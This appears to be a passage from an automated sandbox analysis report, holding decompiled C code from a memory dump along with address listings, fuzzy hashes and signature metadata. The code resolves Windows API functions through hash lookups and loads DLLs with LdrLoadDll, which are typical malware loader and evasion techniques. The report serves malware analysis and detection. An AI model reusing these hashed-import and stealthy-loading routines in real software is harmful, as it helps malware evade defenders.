																						goto L174;
																					}
																				} else {
																					do {
																						_t359 = _t314;
																						_t244 = _t359;
																						while( *((intOrPtr*)(_t244 + _t395 + 8)) != 0x4e2f8db7) {
																							_t359 = _t359 + 1;
																							_t244 = _t244 + 0x18;
																							if(_t359 < 0x10) {
																								continue;
																							} else {
																								goto L170;
																							}
																							goto L236;
																						}
																						_t241 =  *((intOrPtr*)(_t244 + _t395 + 0x14));
																						if(_t241 != 0) {
																							L174:
																							if(_t241 == 0) {
																								L176:
																								E008B9510(_t445 + 4);
																								if(_v108 != 0) {
																									E008BBE30( &_v112, _t433);
																								}
																								goto L122;
																							} else {
																								_push( *_t433);
																								asm("int3");
																								return _t241;
																							}
																						} else {
																							goto L171;
																						}
																						goto L236;
																						L170:
																						asm("o16 nop [eax+eax]");
																						_t395 =  *(_t395 + 0x180);
																					} while (_t395 != 0);
																					goto L171;
																				}
																			}
																		}
																	}
																} else {
																	goto L160;
																}
																goto L236;
																L159:
																asm("o16 nop [eax+eax]");
																_t388 =  *(_t388 + 0x180);
															} while (_t388 != 0);
															goto L160;
														}
													}
												} else {
													if(_v84 != 0) {
														E008BBE30( &_v88, _t432);
													}
													goto L122;
												}
											} else {
												if( *((char*)(_t445 + 0x198)) != 0) {
													E008BBE30( &_v84, _t432);
												}
												L122:
												_t434 = _t314;
												_t219 =  *0x8cb1f0; // 0xee59a0
												 *(_t219 + 0x2c) = _t434;
												goto L124;
											}
										} else {
											_t264 = E008A5100(_t419, _t432, _t439);
											_t400 =  *0x8cb1f0; // 0xee59a0
											if(_t264 == 0) {
												if( *((char*)(_t400 + 0x28)) == 0) {
													 *(_t400 + 0x2c) = 3;
												} else {
													 *(_t400 + 0x2c) = 5;
												}
											} else {
												 *(_t400 + 0x2c) = 6;
											}
											L124:
											_t389 =  *0x8cb1f4; // 0xec1568
											if(_t389 == 0xc139578) {
												 *0x8cb1f4 = 0;
												goto L130;
											} else {
												if(_t389 == 0) {
													L130:
													_push(0xa1310f65);
													_t316 = E008A7564(0xa1310f65);
													if(_t316 == 0) {
														if(E008A6C50(0xa1310f65) != 0) {
															_push(0xa1310f65);
															_t316 = E008A7564(0xa1310f65);
														}
													}
													if(_t316 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t392 = E008A67C8(_t316, 0x4e85f18d);
														goto L133;
													}
												} else {
													do {
														_t354 = _t314;
														_t229 = _t354;
														while( *((intOrPtr*)(_t229 + _t389 + 8)) != 0x4e85f18d) {
															_t354 = _t354 + 1;
															_t229 = _t229 + 0x18;
															if(_t354 < 0x10) {
																continue;
															} else {
																goto L129;
															}
															goto L135;
														}
														_t392 =  *((intOrPtr*)(_t229 + _t389 + 0x14));
														if(_t392 != 0) {
															L133:
															if(_t392 != 0) {
																GetSystemInfo( &_v156);
															}
														} else {
															goto L130;
														}
														goto L135;
														L129:
														asm("o16 nop [eax+eax]");
														_t389 =  *(_t389 + 0x180);
													} while (_t389 != 0);
													goto L130;
												}
											}
											L135:
											_t223 =  *0x8cb1f0; // 0xee59a0
											 *((short*)(_t223 + 0xe)) = _v156.dwAllocationGranularity;
											 *((intOrPtr*)(_t223 + 0x10)) = _v156.lpMaximumApplicationAddress;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t445 + 0x16c));
											 *((intOrPtr*)(_t223 + 0x18)) = _v156.dwNumberOfProcessors;
											 *((intOrPtr*)(_t223 + 0x1c)) = _v120;
											return _t223;
										}
									} else {
										_push(_t416);
										asm("int3");
										return _t308;
									}
								} else {
									break;
								}
								goto L236;
								L10:
								asm("o16 nop [eax+eax]");
								_t377 =  *(_t377 + 0x180);
							} while (_t377 != 0);
							L11:
							_push(0xa1310f65);
							_t425 = E008A7564(0xa1310f65);
							if(_t425 == 0) {
								if(E008A6C50(0xa1310f65) != 0) {
									_push(0xa1310f65);
									_t425 = E008A7564(0xa1310f65);
								}
							}
							if(_t425 == 0) {
								goto L16;
							} else {
								_t445 = _t445 + 0xfffffff8;
								_t308 = E008A67C8(_t425, 0x13e99f60);
								goto L14;
							}
						}
					}
				} else {
					return _t163;
				}
				L236:
			}

0x008a3931
0x008a3936
0x008a3937
0x008a3938
0x008a3939
0x008a393f
0x008a3941
0x008a394b
0x008a478e
0x008a4790
0x008a4795
0x008a4798
0x008a4798
0x008a3955
0x008a396a
0x008a3976
0x008a397b
0x008a397e
0x008a3984
0x008a3992
0x008a477d
0x008a4787
0x00000000
0x008a3998
0x008a399a
0x008a47a2
0x00000000
0x008a39a0
0x008a39a0
0x008a39a2
0x008a39a2
0x008a39a4
0x008a39a6
0x008a39b4
0x008a39b5
0x008a39bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a39bb
0x008a476c
0x008a4772
0x008a39f5
0x008a39f7
0x008a39fc
0x008a39fc
0x008a3a06
0x008a3a0a
0x008a3a0e
0x008a3a14
0x008a3a17
0x008a3a2d
0x008a3a32
0x008a3a3a
0x008a3a41
0x008a3a44
0x008a3a4a
0x008a3a51
0x008a3a59
0x008a4739
0x00000000
0x008a3a5f
0x008a3a61
0x008a3a8e
0x008a3a93
0x008a3a99
0x008a3a9d
0x008a4710
0x008a471b
0x008a4721
0x008a4721
0x008a4710
0x008a3aa5
0x008a3aae
0x008a3ab6
0x00000000
0x008a3ab6
0x008a3a63
0x008a3a63
0x008a3a63
0x008a3a65
0x008a3a67
0x008a3a75
0x008a3a76
0x008a3a7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a3a7c
0x008a4728
0x008a472e
0x008a3ab8
0x008a3aba
0x008a3ac6
0x008a3ac6
0x00000000
0x008a4734
0x00000000
0x008a4734
0x00000000
0x008a3a7e
0x008a3a7e
0x008a3a84
0x008a3a8a
0x00000000
0x008a3a63
0x008a3a61
0x008a3ac8
0x008a3ac8
0x008a3ad5
0x008a3add
0x008a3ad7
0x008a3ad7
0x008a3ad7
0x008a3ae1
0x008a3ae6
0x008a3aee
0x008a3af9
0x008a3b05
0x008a3b0c
0x008a3b14
0x008a3b1c
0x008a3b25
0x008a3b2e
0x008a3b30
0x008a3b35
0x008a3b37
0x008a3b44
0x008a3b4b
0x008a3b5d
0x008a3b62
0x008a3b63
0x008a3b65
0x008a3b6a
0x008a3b72
0x008a3b7b
0x008a3b82
0x008a3b9b
0x008a3ba0
0x008a3bae
0x008a3bb3
0x008a3bb7
0x008a3bbe
0x008a3c22
0x008a3c27
0x008a3c3a
0x008a3c3e
0x008a3c57
0x008a3c5c
0x008a3c6f
0x008a3c78
0x008a3c7f
0x008a3cd3
0x008a465c
0x008a466f
0x008a467c
0x008a467e
0x008a4687
0x008a4692
0x008a468e
0x008a468e
0x008a468e
0x008a4699
0x008a469c
0x008a469c
0x008a4699
0x008a46a1
0x008a46ac
0x00000000
0x008a465e
0x008a4661
0x008a46bd
0x008a46ca
0x008a46cc
0x008a46d5
0x008a46e0
0x008a46dc
0x008a46dc
0x008a46dc
0x008a46e7
0x008a46ea
0x008a46ea
0x008a46e7
0x008a46ef
0x008a46fa
0x00000000
0x008a4663
0x00000000
0x008a4663
0x008a4661
0x00000000
0x008a3cd9
0x008a3cdc
0x00000000
0x008a4108
0x008a410f
0x008a411c
0x008a411e
0x008a4127
0x008a4132
0x008a412e
0x008a412e
0x008a412e
0x008a4139
0x008a413c
0x008a413c
0x008a4139
0x008a4141
0x008a414c
0x008a414c
0x008a3cdc
0x008a3c81
0x008a3c83
0x008a3ce7
0x008a3cee
0x008a3cfb
0x008a3cfd
0x008a3d06
0x008a3d11
0x008a3d0d
0x008a3d0d
0x008a3d0d
0x008a3d18
0x008a3d1b
0x008a3d1b
0x008a3d18
0x008a3d20
0x008a3d2b
0x008a3c85
0x008a3c8c
0x008a3c99
0x008a3c9b
0x008a3ca4
0x008a3caf
0x008a3cab
0x008a3cab
0x008a3cab
0x008a3cb6
0x008a3cb9
0x008a3cb9
0x008a3cb6
0x008a3cbe
0x008a3cc9
0x008a3cc9
0x008a3c83
0x008a3bc0
0x008a3bc7
0x008a3bd4
0x008a3bd6
0x008a3bdf
0x008a3bea
0x008a3be6
0x008a3be6
0x008a3be6
0x008a3bf1
0x008a3bf4
0x008a3bf4
0x008a3bf1
0x008a3bf9
0x008a3c04
0x008a3c04
0x008a3afb
0x008a3afb
0x008a3afb
0x008a3d2d
0x008a3d2d
0x008a3d33
0x008a3d3e
0x008a3d41
0x008a3d4d
0x008a464b
0x00000000
0x008a3d53
0x008a3d55
0x008a3d82
0x008a3d87
0x008a3d8d
0x008a3d91
0x008a4622
0x008a462d
0x008a4633
0x008a4633
0x008a4622
0x008a3d99
0x00000000
0x008a3d9f
0x008a3da6
0x008a3dae
0x00000000
0x008a3dae
0x008a3d57
0x008a3d57
0x008a3d57
0x008a3d59
0x008a3d5b
0x008a3d69
0x008a3d6a
0x008a3d70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a3d70
0x008a463a
0x008a4640
0x008a3db0
0x008a3db2
0x008a3e6d
0x008a3e6d
0x008a3db8
0x008a3dbf
0x008a3dc0
0x008a3dc2
0x008a3dc8
0x00000000
0x008a3dce
0x008a3dce
0x008a3dda
0x008a418b
0x00000000
0x008a3de0
0x008a3de2
0x008a3e0f
0x008a3e14
0x008a3e1a
0x008a3e1e
0x008a4162
0x008a416d
0x008a4173
0x008a4173
0x008a4162
0x008a3e26
0x00000000
0x008a3e28
0x008a3e2f
0x008a3e37
0x00000000
0x008a3e37
0x008a3de4
0x008a3de4
0x008a3de4
0x008a3de6
0x008a3de8
0x008a3df6
0x008a3df7
0x008a3dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a3dfd
0x008a417a
0x008a4180
0x008a3e39
0x008a3e3b
0x00000000
0x008a3e3d
0x008a3e58
0x008a3e5c
0x00000000
0x008a3e5e
0x008a3e68
0x008a3e68
0x008a3e5c
0x008a4186
0x00000000
0x008a4186
0x00000000
0x008a3dff
0x008a3dff
0x008a3e05
0x008a3e0b
0x00000000
0x008a3de4
0x008a3de2
0x008a3dda
0x008a3dc8
0x008a4646
0x00000000
0x008a4646
0x00000000
0x008a3d72
0x008a3d72
0x008a3d78
0x008a3d7e
0x00000000
0x008a3d57
0x008a3d55
0x008a3e6f
0x008a3e6f
0x008a3e75
0x008a3e8a
0x008a3e8d
0x008a3ec8
0x008a3ece
0x008a3edf
0x008a4607
0x00000000
0x008a3ee5
0x008a3ee7
0x008a3f14
0x008a3f19
0x008a3f1f
0x008a3f23
0x008a45de
0x008a45e9
0x008a45ef
0x008a45ef
0x008a45de
0x008a3f2b
0x008a3f34
0x008a3f3c
0x00000000
0x008a3f3c
0x008a3ee9
0x008a3ee9
0x008a3ee9
0x008a3eeb
0x008a3eed
0x008a3efb
0x008a3efc
0x008a3f02
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a3f02
0x008a45f6
0x008a45fc
0x008a3f3e
0x008a3f40
0x008a3f4e
0x008a3f4e
0x008a4602
0x00000000
0x008a4602
0x00000000
0x008a3f04
0x008a3f04
0x008a3f0a
0x008a3f10
0x00000000
0x008a3ee9
0x008a3ee7
0x008a3f50
0x008a3f57
0x008a3f5e
0x008a3f60
0x008a3f6b
0x008a3f8c
0x008a3f92
0x008a3fa3
0x008a45c3
0x00000000
0x008a3fa9
0x008a3fab
0x008a3fd8
0x008a3fdd
0x008a3fe3
0x008a3fe7
0x008a459a
0x008a45a5
0x008a45ab
0x008a45ab
0x008a459a
0x008a3fef
0x008a3ff8
0x008a4000
0x00000000
0x008a4000
0x008a3fad
0x008a3fad
0x008a3fad
0x008a3faf
0x008a3fb1
0x008a3fbf
0x008a3fc0
0x008a3fc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a3fc6
0x008a45b2
0x008a45b8
0x008a4002
0x008a4004
0x008a4019
0x008a4019
0x008a45be
0x00000000
0x008a45be
0x00000000
0x008a3fc8
0x008a3fc8
0x008a3fce
0x008a3fd4
0x00000000
0x008a3fad
0x008a3fab
0x008a401b
0x008a401b
0x008a4024
0x008a41de
0x008a41e3
0x008a41f3
0x008a41f5
0x008a4201
0x008a457f
0x00000000
0x008a4207
0x008a4209
0x008a4236
0x008a423b
0x008a4241
0x008a4245
0x008a4556
0x008a4561
0x008a4567
0x008a4567
0x008a4556
0x008a424d
0x00000000
0x008a4253
0x008a425a
0x008a4262
0x00000000
0x008a4262
0x008a420b
0x008a420b
0x008a420b
0x008a420d
0x008a420f
0x008a421d
0x008a421e
0x008a4224
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4224
0x008a456e
0x008a4574
0x008a4264
0x008a4266
0x008a4470
0x008a4474
0x008a4481
0x008a448e
0x008a448e
0x00000000
0x008a426c
0x008a4285
0x008a4289
0x00000000
0x008a428f
0x008a428f
0x008a429b
0x008a453b
0x00000000
0x008a42a1
0x008a42a3
0x008a42d0
0x008a42d5
0x008a42db
0x008a42e2
0x008a4511
0x008a451c
0x008a4522
0x008a4522
0x008a4511
0x008a42ec
0x00000000
0x008a42f2
0x008a42f2
0x008a42fe
0x00000000
0x008a42fe
0x008a42a5
0x008a42a5
0x008a42a5
0x008a42a7
0x008a42a9
0x008a42b7
0x008a42b8
0x008a42be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a42be
0x008a452a
0x008a4530
0x008a4303
0x008a4305
0x008a4448
0x008a444c
0x008a4459
0x008a4466
0x008a4466
0x00000000
0x008a430b
0x008a430b
0x008a430d
0x008a430e
0x008a430e
0x008a4536
0x00000000
0x008a4536
0x00000000
0x008a42c0
0x008a42c0
0x008a42c6
0x008a42cc
0x00000000
0x008a42a5
0x008a42a3
0x008a429b
0x008a4289
0x008a457a
0x00000000
0x008a457a
0x00000000
0x008a4226
0x008a4226
0x008a422c
0x008a4232
0x00000000
0x008a420b
0x008a4209
0x008a402a
0x008a4032
0x008a403b
0x008a403b
0x00000000
0x008a4032
0x008a3f6d
0x008a3f75
0x008a3f82
0x008a3f82
0x008a4040
0x008a4040
0x008a4042
0x008a4047
0x00000000
0x008a4047
0x008a3e8f
0x008a3e8f
0x008a3e94
0x008a3e9c
0x008a3eae
0x008a3ebc
0x008a3eb0
0x008a3eb0
0x008a3eb0
0x008a3e9e
0x008a3e9e
0x008a3e9e
0x008a404a
0x008a404a
0x008a4056
0x008a41cf
0x00000000
0x008a405c
0x008a405e
0x008a408b
0x008a4090
0x008a4096
0x008a409a
0x008a41a6
0x008a41b1
0x008a41b7
0x008a41b7
0x008a41a6
0x008a40a2
0x008a40ab
0x008a40b3
0x00000000
0x008a40b3
0x008a4060
0x008a4060
0x008a4060
0x008a4062
0x008a4064
0x008a4072
0x008a4073
0x008a4079
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a4079
0x008a41be
0x008a41c4
0x008a40b5
0x008a40b7
0x008a40c1
0x008a40c1
0x008a41ca
0x00000000
0x008a41ca
0x00000000
0x008a407b
0x008a407b
0x008a4081
0x008a4087
0x00000000
0x008a4060
0x008a405e
0x008a40c3
0x008a40c3
0x008a40eb
0x008a40ef
0x008a40f2
0x008a40f5
0x008a40f8
0x008a4107
0x008a4107
0x008a39f9
0x008a39f9
0x008a39fa
0x008a39fb
0x008a39fb
0x008a4778
0x00000000
0x008a4778
0x00000000
0x008a39bd
0x008a39bd
0x008a39c3
0x008a39c9
0x008a39cd
0x008a39d2
0x008a39d8
0x008a39dc
0x008a4754
0x008a475f
0x008a4765
0x008a4765
0x008a4754
0x008a39e4
0x00000000
0x008a39e6
0x008a39ed
0x008a39f0
0x00000000
0x008a39f0
0x008a39e4
0x008a399a
0x008a395d
0x008a3969
0x008a3969
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb1e5aab1f792a0ea46ab2777a4953d43bbd709cc3176bede7614cca9dc8f485
Instruction ID: 743d6201472cc33c0980abf37ff9800513817227c0c70253659693fc204adfec
Opcode Fuzzy Hash: cb1e5aab1f792a0ea46ab2777a4953d43bbd709cc3176bede7614cca9dc8f485
Instruction Fuzzy Hash: AD520730A043418BFB349B1888917AA76A5FFD3308F28962DF445DBB92EB74DD45C792

Uniqueness

Uniqueness Score: -1.00%

Function 008A6C50, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 584
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E008A6C50(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t135;
				intOrPtr _t138;
				void* _t143;
				void* _t147;
				void* _t151;
				struct _OBJDIR_INFORMATION _t164;
				void* _t170;
				intOrPtr _t183;
				struct _OBJDIR_INFORMATION _t197;
				struct _OBJDIR_INFORMATION _t206;
				long _t212;
				void* _t215;
				intOrPtr _t246;
				signed int _t278;
				signed int _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t291;
				void* _t340;
				struct _OBJDIR_INFORMATION _t342;
				intOrPtr _t345;
				struct _OBJDIR_INFORMATION _t363;
				intOrPtr _t366;
				struct _OBJDIR_INFORMATION _t382;
				struct _OBJDIR_INFORMATION _t389;
				struct _OBJDIR_INFORMATION _t390;
				struct _OBJDIR_INFORMATION _t391;
				intOrPtr* _t394;
				void* _t395;
				intOrPtr* _t397;
				void* _t398;
				void* _t399;
				void* _t401;
				void* _t402;
				void* _t404;
				void* _t405;
				void* _t406;
				short* _t407;
				void* _t408;
				void* _t410;
				void* _t411;
				intOrPtr _t412;
				intOrPtr* _t413;
				short* _t418;
				void* _t420;
				void* _t421;
				intOrPtr* _t422;
				void* _t424;
				void* _t425;
				struct _OBJDIR_INFORMATION* _t426;

				_t278 = __ecx;
				E008A8810(_t426 + 0x2c8, 0);
				E008A8810(_t426 + 0x2d0, 0);
				_t135 = E008A3930(__ecx, 0, _t399, _t406);
				_t412 =  *0x8cb208; // 0xee5a38
				if( *((char*)(_t135 + 0xb)) == 0x40) {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t413 = E008A1030();
						_t426 = _t426 + 4;
						if(_t413 == 0) {
							_t413 = 0;
						} else {
							_t122 = _t413 + 8; // 0x8
							 *_t413 = 0;
							 *((intOrPtr*)(_t413 + 4)) = 0;
							E008A8810(_t122, 0);
							_t124 = _t413 + 0x10; // 0x10
							E008A8810(_t124, 0);
							_t125 = _t413 + 0x18; // 0x18
							E008A8810(_t125, 0);
							_t126 = _t413 + 0x20; // 0x20
							E008A8810(_t126, 0);
							_t127 = _t413 + 0x28; // 0x28
							E008A8810(_t127, 0);
							_t128 = _t413 + 0x30; // 0x30
							E008A8810(_t128, 0);
							_t129 = _t413 + 0x38; // 0x38
							E008A8810(_t129, 0);
							_t130 = _t413 + 0x40; // 0x40
							E008A8810(_t130, 0);
							_t131 = _t413 + 0x48; // 0x48
							E008A8810(_t131, 0);
							_t410 = 6;
							_t132 = _t413 + 0x50; // 0x50
							_t404 = _t132;
							do {
								E008A8810(_t404, 0);
								_t404 = _t404 + 8;
								_t410 = _t410 - 1;
							} while (_t410 != 0);
						}
						 *0x8cb208 = _t413;
					}
					if(E008A9DC0(_t413 + 0x38) != 0) {
						E008A8810(_t426 + 0x26c, 0x80);
						_t342 =  *0x8cb1f4; // 0xec1568
						if(_t342 == 0xc139578) {
							 *0x8cb1f4 = 0;
							goto L86;
						} else {
							if(_t342 == 0) {
								L86:
								_push(0xa1310f65);
								_t420 = E008A7564(0xa1310f65);
								if(_t420 == 0) {
									if(E008A6C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t420 = E008A7564(0xa1310f65);
									}
								}
								if(_t420 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t394 = E008A67C8(_t420, 0x7c2e142f);
									goto L89;
								}
							} else {
								do {
									_t421 = 0;
									_t395 = 0;
									while( *((intOrPtr*)(_t395 + _t342 + 8)) != 0x7c2e142f) {
										_t421 = _t421 + 1;
										_t395 = _t395 + 0x18;
										if(_t421 < 0x10) {
											continue;
										} else {
											goto L85;
										}
										goto L91;
									}
									_t394 =  *((intOrPtr*)(_t395 + _t342 + 0x14));
									if(_t394 != 0) {
										L89:
										if(_t394 != 0) {
											 *_t394( *(_t426 + 0x26c),  *(_t426 + 0x26c) >> 1);
										}
									} else {
										goto L86;
									}
									goto L91;
									L85:
									asm("o16 nop [eax+eax]");
									_t342 =  *(_t342 + 0x180);
								} while (_t342 != 0);
								goto L86;
							}
						}
						L91:
						if(( *(E008A9DE0(_t426 + 0x268)) & 0x0000ffff) != 0x5c) {
							E008A96D0(_t426 + 0x26c, 0x5c);
						}
						_t345 =  *0x8cb208; // 0xee5a38
						E008A8CC0(_t345 + 0x38,  *((intOrPtr*)(_t426 + 0x268)));
						E008A8CA0(_t426 + 0x268);
					}
					_t138 =  *0x8cb208; // 0xee5a38
					E008A88C0(_t426 + 0x274, _t138 + 0x38);
					E008A8CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x270)));
					_t291 = _t426 + 0x270;
				} else {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t422 = E008A1030();
						_t426 = _t426 + 4;
						if(_t422 == 0) {
							_t422 = 0;
						} else {
							_t95 = _t422 + 8; // 0x8
							 *_t422 = 0;
							 *((intOrPtr*)(_t422 + 4)) = 0;
							E008A8810(_t95, 0);
							_t97 = _t422 + 0x10; // 0x10
							E008A8810(_t97, 0);
							_t98 = _t422 + 0x18; // 0x18
							E008A8810(_t98, 0);
							_t99 = _t422 + 0x20; // 0x20
							E008A8810(_t99, 0);
							_t100 = _t422 + 0x28; // 0x28
							E008A8810(_t100, 0);
							_t101 = _t422 + 0x30; // 0x30
							E008A8810(_t101, 0);
							_t102 = _t422 + 0x38; // 0x38
							E008A8810(_t102, 0);
							_t103 = _t422 + 0x40; // 0x40
							E008A8810(_t103, 0);
							_t104 = _t422 + 0x48; // 0x48
							E008A8810(_t104, 0);
							_t411 = 6;
							_t105 = _t422 + 0x50; // 0x50
							_t405 = _t105;
							do {
								E008A8810(_t405, 0);
								_t405 = _t405 + 8;
								_t411 = _t411 - 1;
							} while (_t411 != 0);
						}
						 *0x8cb208 = _t422;
					}
					if(E008A9DC0(_t422 + 0x30) != 0) {
						E008A8810(_t426 + 0x27c, 0x80);
						_t363 =  *0x8cb1f4; // 0xec1568
						if(_t363 == 0xc139578) {
							 *0x8cb1f4 = 0;
							goto L10;
						} else {
							if(_t363 == 0) {
								L10:
								_push(0xa1310f65);
								_t424 = E008A7564(0xa1310f65);
								if(_t424 == 0) {
									if(E008A6C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t424 = E008A7564(0xa1310f65);
									}
								}
								if(_t424 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t397 = E008A67C8(_t424, 0x4ade4070);
									goto L13;
								}
							} else {
								do {
									_t425 = 0;
									_t398 = 0;
									while( *((intOrPtr*)(_t398 + _t363 + 8)) != 0x4ade4070) {
										_t425 = _t425 + 1;
										_t398 = _t398 + 0x18;
										if(_t425 < 0x10) {
											continue;
										} else {
											goto L9;
										}
										goto L15;
									}
									_t397 =  *((intOrPtr*)(_t398 + _t363 + 0x14));
									if(_t397 != 0) {
										L13:
										if(_t397 != 0) {
											 *_t397( *(_t426 + 0x27c),  *(_t426 + 0x27c) >> 1);
										}
										goto L15;
									} else {
										goto L10;
									}
									L106:
									L9:
									asm("o16 nop [eax+eax]");
									_t363 =  *(_t363 + 0x180);
								} while (_t363 != 0);
								goto L10;
							}
						}
						L15:
						if(( *(E008A9DE0(_t426 + 0x278)) & 0x0000ffff) != 0x5c) {
							E008A96D0(_t426 + 0x27c, 0x5c);
						}
						_t366 =  *0x8cb208; // 0xee5a38
						E008A8CC0(_t366 + 0x30,  *((intOrPtr*)(_t426 + 0x278)));
						E008A8CA0(_t426 + 0x278);
					}
					_t246 =  *0x8cb208; // 0xee5a38
					E008A88C0(_t426 + 0x2c0, _t246 + 0x30);
					E008A8CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x2bc)));
					_t291 = _t426 + 0x2bc;
				}
				E008A8CA0(_t291);
				_t143 = E008B0220(_t426 + 0x2d4,  *((intOrPtr*)(_t426 + 0x2c8)), 0);
				E008A8810(_t426 + 0x2d8, 0x2800);
				_t407 =  *((intOrPtr*)(_t426 + 0x2d4));
				 *_t407 = 0;
				E008B9470(_t426 + 0x2ac,  &E008CA1A0, 0x28);
				_t147 = E008B9640(_t426 + 0x2a8, 0);
				E008BE780(_t278, _t147, E008B9650(_t426 + 0x2a4));
				 *((intOrPtr*)(_t426 + 0x294)) = _t407;
				 *((char*)(_t426 + 0x290)) = 0;
				 *((intOrPtr*)(_t426 + 0x298)) = 0;
				 *((intOrPtr*)(_t426 + 0x29c)) = 2;
				 *((char*)(_t426 + 0x2a0)) = 1;
				_t151 = E008B9640(_t426 + 0x2a8, 0);
				_push(_t426 + 0x290);
				_push(E008A7CD0);
				_push(0);
				_push(0x7fffffff);
				_push(0x8ca1c8);
				E008BE5D0(_t151, 0x28, _t407);
				E008B9510(_t426 + 0x2a4);
				E008B0220(_t143,  *((intOrPtr*)(_t426 + 0x2d8)), 0);
				E008A8CA0(_t426 + 0x2d4);
				 *_t426 = 0;
				 *(_t426 + 4) = 1;
				 *((intOrPtr*)(_t426 + 8)) = 0;
				 *((intOrPtr*)(_t426 + 0xc)) = 3;
				E008A8AB0(_t426 + 0x18,  *((intOrPtr*)(_t426 + 0x2d0)), 0);
				_push(1);
				if(E008BCEA0(_t278, _t426 + 4, 0x28, _t143, _t407) == 0) {
					L53:
					E008A8CA0(_t426 + 0x10);
					if( *(_t426 + 4) != 0) {
						_t382 =  *_t426;
						if(_t382 == 0 || _t382 == 0xffffffff) {
							_t164 = 1;
						} else {
							_t164 = 0;
						}
						if(_t164 == 0) {
							E008BCE70(_t382);
						}
					}
					 *_t426 = 0;
					E008A8CA0(_t426 + 0x2cc);
					E008A8CA0(_t426 + 0x2c4);
					return 0;
				} else {
					_t279 = _t278 ^ 0x38ba5c7b;
					_t408 = _t426 + 0x44;
					_t401 = _t426 + 0x2e8;
					while(1) {
						E008A8AB0(_t426 + 0x2e8, _t408, 0);
						E008A9E70(_t426 + 0x2e4, _t401);
						E008A83B0(_t426 + 0x2f0);
						_t170 = E008BD620( *((intOrPtr*)(_t426 + 0x2f0)), E008B6040( *((intOrPtr*)(_t426 + 0x2f0)), 0x7fffffff));
						E008B0B10(_t426 + 0x2f0);
						if(_t279 == _t170) {
							break;
						}
						E008A8CA0(_t401);
						E008A8CA0(_t426 + 0x2e0);
						if(E008BD0E0(_t426) != 0) {
							continue;
						} else {
							goto L53;
						}
						goto L106;
					}
					E008A8CA0(_t401);
					E008A88C0(_t426 + 0x2b8, _t426 + 0x2c4);
					E008B0220(_t426 + 0x2bc,  *((intOrPtr*)(_t426 + 0x2e4)), 0);
					_t409 =  *((intOrPtr*)(_t426 + 0x2b4));
					_push(E008B0180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff,  *((intOrPtr*)(_t426 + 0x2b4))) + _t179 + 0xa);
					E008B9350(_t426 + 0x284);
					_t418 = E008B9640(_t426 + 0x284, 0);
					_t183 = E008B9640(_t426 + 0x284, 8);
					_t402 = E008B0180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff, _t409);
					 *((intOrPtr*)(_t418 + 4)) = _t183;
					 *_t418 = _t402 + _t402;
					 *((short*)(_t418 + 2)) = _t402 + _t402 + 2;
					E008B01B0(_t183, _t409, _t402 + _t402 + 2, _t409, 0);
					_t389 =  *0x8cb1f4; // 0xec1568
					 *(_t426 + 0x2dc) = 0;
					if(_t389 == 0xc139578) {
						 *0x8cb1f4 = 0;
						goto L29;
					} else {
						if(_t389 == 0) {
							L29:
							_push(0x588ab3ea);
							_t281 = E008A7564(0x588ab3ea);
							if(_t281 == 0) {
								if(E008A6C50(0x588ab3ea) != 0) {
									_push(0x588ab3ea);
									_t281 = E008A7564(0x588ab3ea);
								}
							}
							if(_t281 == 0) {
								goto L43;
							} else {
								_t426 = _t426 + 0xfffffff8;
								_t282 = E008A67C8(_t281, 0x208c2589);
								goto L32;
							}
						} else {
							do {
								_t340 = 0;
								_t215 = 0;
								while( *((intOrPtr*)(_t215 + _t389 + 8)) != 0x208c2589) {
									_t340 = _t340 + 1;
									_t215 = _t215 + 0x18;
									if(_t340 < 0x10) {
										continue;
									} else {
										goto L28;
									}
									goto L106;
								}
								_t282 =  *((intOrPtr*)(_t215 + _t389 + 0x14));
								if(_t282 != 0) {
									L32:
									if(_t282 == 0) {
										L43:
										if( *(_t426 + 0x2dc) == 0) {
											goto L35;
										} else {
											goto L44;
										}
									} else {
										_t212 = LdrLoadDll(0, 0, E008B9640(_t426 + 0x284, 0), _t426 + 0x2dc); // executed
										if( *(_t426 + 0x2dc) == 0 || _t212 != 0) {
											L35:
											E008B9510(_t426 + 0x280);
											E008A8CA0(_t426 + 0x2b4);
											E008A8CA0(_t426 + 0x2e0);
											E008A8CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t390 =  *_t426;
												if(_t390 == 0 || _t390 == 0xffffffff) {
													_t197 = 1;
												} else {
													_t197 = 0;
												}
												if(_t197 == 0) {
													E008BCE70(_t390);
												}
											}
											 *_t426 = 0;
											E008A8CA0(_t426 + 0x2cc);
											E008A8CA0(_t426 + 0x2c4);
											return 0;
										} else {
											L44:
											E008B9510(_t426 + 0x280);
											E008A8CA0(_t426 + 0x2b4);
											E008A8CA0(_t426 + 0x2e0);
											E008A8CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t391 =  *_t426;
												if(_t391 == 0 || _t391 == 0xffffffff) {
													_t206 = 1;
												} else {
													_t206 = 0;
												}
